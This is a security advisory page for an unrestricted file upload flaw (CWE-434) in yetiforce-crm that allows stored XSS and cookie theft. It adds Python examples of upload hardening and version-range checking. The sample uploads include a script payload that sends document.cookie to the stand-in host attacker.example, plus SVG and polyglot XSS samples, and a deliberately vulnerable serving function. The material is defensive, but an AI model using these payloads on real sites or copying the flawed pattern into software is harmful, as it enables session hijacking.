GHSA-pqr6-3j58-9w58

Source
https://github.com/advisories/GHSA-pqr6-3j58-9w58
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-pqr6-3j58-9w58/GHSA-pqr6-3j58-9w58.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-pqr6-3j58-9w58
Aliases
Published
2022-05-06T00:00:48Z
Modified
2023-11-08T04:07:48.069962Z
Severity
  • 6.1 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Summary
Unrestricted Upload of File with Dangerous Type in yetiforce-crm
Details

Unrestricted file upload in GitHub repository yetiforcecompany/yetiforcecrm prior to 6.4.0. An attacker can upload malicious files that are later delivered to victims: the web application serves the stored data back without making it safe to render in the browser, so the attacker's content executes in the victim's session, steals the victim's cookie and leads to account takeover.
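The pattern the advisory describes, as an added example that is not YetiForce's code or its fix: a file is accepted without checks and later served inline under the client-chosen name, so an uploaded HTML or SVG file renders in the application's origin (CWE-434 leading to stored XSS and cookie theft). Beside it is a hardened version with an extension allowlist, magic-byte checks, a scan for browser-active markup, random storage names, and attachment/nosniff headers. The sample uploads, the `attacker.example` host and all function names are constructed for the example.

```python
"""Added example, not YetiForce code: the upload-then-serve pattern behind
CWE-434 stored XSS, next to a hardened version. Inputs are constructed."""
import secrets
from typing import Dict, Tuple

# Allowlist: extension -> Content-Type the server uses when serving the file.
# Neither the client-supplied type nor the client's filename picks this.
ALLOWED_TYPES: Dict[str, str] = {
    "pdf": "application/pdf",
    "png": "image/png",
    "jpg": "image/jpeg",
    "jpeg": "image/jpeg",
    "txt": "text/plain",
}

# Leading bytes each binary type must start with.
MAGIC: Dict[str, Tuple[bytes, ...]] = {
    "pdf": (b"%PDF-",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}

# Markup that turns a response into active content if it is ever rendered
# inline in the application's origin (plain HTML, SVG, or a polyglot body).
ACTIVE_MARKERS = (b"<script", b"<html", b"<svg", b"<?xml", b"javascript:", b"onload=")


def vulnerable_serve(filename: str) -> Dict[str, str]:
    """The flawed pattern: no check at upload, and the stored file is served
    inline with a type derived from the attacker-chosen name. An uploaded
    .html or .svg then runs script in the victim's browser with the app's
    cookies, which is the cookie theft the advisory describes."""
    ext = filename.rsplit(".", 1)[-1].lower()
    guessed = {"html": "text/html", "svg": "image/svg+xml"}.get(ext, "application/octet-stream")
    return {"Content-Type": guessed, "Content-Disposition": f'inline; filename="{filename}"'}


def validate_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Hardened upload check: extension allowlist, magic-byte match for binary
    types, and a scan of the leading bytes for browser-active markup."""
    if "." not in filename:
        return False, "no extension"
    ext = filename.rsplit(".", 1)[-1].lower()
    if ext not in ALLOWED_TYPES:
        return False, f"extension .{ext} not allowed"
    if ext in MAGIC and not data.startswith(MAGIC[ext]):
        return False, f"content does not match .{ext} signature"
    if any(marker in data[:4096].lower() for marker in ACTIVE_MARKERS):
        return False, "browser-active content in file body"
    return True, "ok"


def stored_name(ext: str) -> str:
    """Random server-side name: the client's filename never reaches the
    filesystem, so traversal or double-extension tricks have nothing to act on."""
    return f"{secrets.token_hex(16)}.{ext}"


def hardened_headers(ext: str, download_name: str) -> Dict[str, str]:
    """Serve stored files as attachments with a server-chosen type and nosniff,
    so even a polyglot that slips past validation cannot render in the origin."""
    safe_name = "".join(c for c in download_name if c.isalnum() or c in "._-") or "download"
    return {
        "Content-Type": ALLOWED_TYPES[ext],
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


# Constructed sample uploads (not captured traffic).
SAMPLES: Dict[str, bytes] = {
    "report.pdf": b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj",
    "logo.png": b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR",
    "payload.html": b"<html><script>new Image().src='//attacker.example/?c='+document.cookie</script>",
    "avatar.svg": b"<svg xmlns='http://www.w3.org/2000/svg' onload='alert(document.cookie)'/>",
    "image.png": b"\x89PNG\r\n\x1a\n<script>alert(1)</script>",  # valid signature, polyglot body
    "notes.jpg": b"GIF89a<script>alert(1)</script>",              # wrong signature for .jpg
}


def triage(samples: Dict[str, bytes] = SAMPLES) -> Dict[str, str]:
    """Run the hardened check over every sample and return the verdicts."""
    return {name: validate_upload(name, data)[1] for name, data in samples.items()}


if __name__ == "__main__":
    for name, verdict in triage().items():
        print(f"{name:14} -> {verdict}")
    print("vulnerable:", vulnerable_serve("payload.html"))
    print("hardened:  ", hardened_headers("pdf", "report.pdf"))
```

The marker scan is a heuristic and will not catch every polyglot; the controls that actually close the XSS path are the server-chosen Content-Type, `Content-Disposition: attachment` and `X-Content-Type-Options: nosniff` on the download response, since a file the browser never renders inline cannot execute in the application's origin regardless of its body.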

Database specific
{
    "nvd_published_at": "2022-05-05T11:15:00Z",
    "github_reviewed_at": "2022-05-24T22:23:32Z",
    "severity": "MODERATE",
    "github_reviewed": true,
    "cwe_ids": [
        "CWE-434"
    ]
}
References

Affected packages

Packagist / yetiforce/yetiforce-crm

Package

Name
yetiforce/yetiforce-crm
Purl
pkg:composer/yetiforce/yetiforce-crm

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
6.4.0

Affected versions

4.*

4.0.0
4.1.0
4.2.0
4.3.0
4.4.0_RC1
4.4.0_RC2
4.4.0_RC3
4.4.0

5.*

5.0.0
5.1.0
5.2.0
5.3.0

6.*

6.0.0a
6.0.0
6.1.0
6.2.0
6.3.0
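How the affected range above (introduced 0, fixed 6.4.0, type ECOSYSTEM) is evaluated against a deployed version, as an added example that is neither OSV's nor YetiForce's code. It assumes Composer ordering for Packagist ranges, where a pre-release such as 6.4.0-RC1 sorts below the 6.4.0 release and is therefore still affected; `parse_version` is a simplified comparator written for the version forms listed on this page, not Composer's full normaliser, and the composer.lock fragment is constructed for the example.

```python
"""Added example, not OSV or YetiForce code: evaluate this advisory's
ECOSYSTEM range (introduced 0, fixed 6.4.0) against Composer-style versions
and check a composer.lock for the package. parse_version is a simplified
comparator, not Composer's full normaliser."""
import json
import re
from typing import List, Optional, Tuple

# The affected range exactly as this advisory lists it.
ADVISORY_EVENTS: List[Tuple[str, str]] = [("introduced", "0"), ("fixed", "6.4.0")]

# Pre-release rank: alpha < beta < rc < final release.
_PRE_RANK = {"a": 0, "alpha": 0, "b": 1, "beta": 1, "rc": 2}
_VERSION_RE = re.compile(r"v?(\d+(?:\.\d+)*)[._-]?(alpha|beta|rc|a|b)?\.?(\d*)", re.I)

VersionKey = Tuple[Tuple[int, ...], Tuple[int, int]]


def parse_version(v: str) -> VersionKey:
    """Turn '4.4.0_RC1', '6.0.0a', 'v6.3.0' or '6.4' into a sortable key:
    numeric parts padded to three, then (pre-release rank, pre-release number).
    A final release gets rank 3 so it sorts after any of its pre-releases,
    matching Composer ordering, where 6.4.0-RC1 < 6.4.0."""
    m = _VERSION_RE.fullmatch(v.strip())
    if not m:
        raise ValueError(f"unparseable version: {v!r}")
    nums = tuple(int(x) for x in m.group(1).split("."))
    nums = nums + (0,) * (3 - len(nums))
    if m.group(2):
        return nums, (_PRE_RANK[m.group(2).lower()], int(m.group(3) or 0))
    return nums, (3, 0)


def _event_key(v: str) -> VersionKey:
    # OSV uses "0" for "introduced in the earliest version"; sort it first.
    return ((0,), (0, 0)) if v == "0" else parse_version(v)


def is_affected(version: str, events: List[Tuple[str, str]] = ADVISORY_EVENTS) -> bool:
    """OSV event semantics: walk the events in version order and the latest
    one at or below the version decides (introduced -> affected, fixed -> not)."""
    key = parse_version(version)
    affected = False
    for kind, v in sorted(events, key=lambda e: _event_key(e[1])):
        if _event_key(v) <= key:
            affected = kind == "introduced"
    return affected


# Constructed composer.lock fragment (not from a real deployment).
SAMPLE_COMPOSER_LOCK = json.dumps({"packages": [
    {"name": "symfony/yaml", "version": "v5.4.0"},
    {"name": "yetiforce/yetiforce-crm", "version": "6.3.0"},
]})


def scan_lock(lock_json: str, package: str = "yetiforce/yetiforce-crm") -> Optional[Tuple[str, bool]]:
    """Return (pinned version, affected?) for the package, or None if absent."""
    for pkg in json.loads(lock_json).get("packages", []):
        if pkg.get("name") == package:
            return pkg["version"], is_affected(pkg["version"])
    return None


if __name__ == "__main__":
    for v in ["4.4.0_RC1", "6.0.0a", "6.3.0", "6.4.0-RC1", "6.4.0", "7.0.0"]:
        print(f"{v:10} affected={is_affected(v)}")
    print(scan_lock(SAMPLE_COMPOSER_LOCK))
```

The pre-release handling is the caveat worth keeping in mind when reading "Fixed 6.4.0": a 6.4.0 release candidate is below the fix boundary and still counts as affected, while 6.4 and 6.4.0 do not. For a real scan, replace the constructed lock fragment with the contents of the deployment's composer.lock.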